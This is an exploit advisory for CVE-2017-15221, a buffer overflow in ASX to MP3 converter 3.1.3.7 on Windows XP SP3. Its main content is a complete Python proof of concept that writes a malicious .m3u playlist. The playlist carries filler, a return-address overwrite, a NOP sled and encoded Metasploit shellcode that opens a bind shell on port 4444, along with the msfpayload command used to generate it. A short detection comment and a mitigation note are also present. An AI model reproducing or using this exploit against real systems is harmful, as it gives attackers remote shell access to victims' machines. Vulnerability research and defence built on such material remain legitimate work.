# Exploit Title: Buffer Overflow via crafted malicious .m3u file
|
|
|
|
|
|
# Exploit Author: Parichay Rai
|
|
|
|
# Tested on: XP Service Pack 3
|
|
|
|
# CVE : CVE-2017-15221
|
|
|
|
Description
|
|
------------
|
|
|
|
A buffer overflow attack is possible due to an improper input validation mechanism.
|
|
|
|
Proof of Concept
|
|
----------------
|
|
|
|
#!/usr/bin/python
# This script generates a malicious playlist for the ASX to MP3 converter 3.1.3.7.2010.
# This exploit works against Windows XP SP3 systems.
# A successful exploit gives you a bind shell on port 4444.

# Bytes the encoded payload must not contain; this is the same list passed
# to msfencode with -b in the generation command below.
# NOTE(review): BadChar is declared but never referenced again in this
# script -- the assembled buffer is not checked against it.
BadChar= "\x00\x0a\x0d\x20"

# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c

# Successful exploitation opens port 4444 on the victim Machine

# Encoded payload produced by the command above. The script treats it as an
# opaque byte string; nothing here decodes or inspects it.
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
"\x40\x61\x18\xaa")

# Layout of the single playlist entry that is written out: a "http://"
# prefix, 17417 bytes of filler, the 4-byte return-address overwrite, a
# 10-byte NOP sled, the payload, and 10 trailing NOPs.
# Detection note: a legitimate .m3u URL entry is nowhere near this size --
# a single playlist line over 17 KiB long is itself a strong indicator.
buffer="http://"
buffer+="A"*17417
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
buffer+="\x90"*10 #NOPs
buffer+=shellcode
buffer+="\x90"*10 #NOPs

# Write the assembled entry to exploit.m3u in the current working directory.
# The file is opened in text mode ("w") and closed explicitly rather than
# through a `with` block.
f=open("exploit.m3u","w")
f.write(buffer);
f.close()
|
|
|
|
----------------------
|
|
Affected Targets
|
|
---------------------
|
|
|
|
ASX to MP3 version 3.1.3.7 and possibly earlier versions
|
|
|
|
|
|
Solution
|
|
---------------
|
|
|
|
Validate input to prevent unexpected data from being processed, such as data that is too long, of the wrong type, or containing "junk" characters.
|
|
|
|
|
|
Credits
|
|
----------
|
|
|
|
Offensive Security
|
|
Rebellious Ceaser |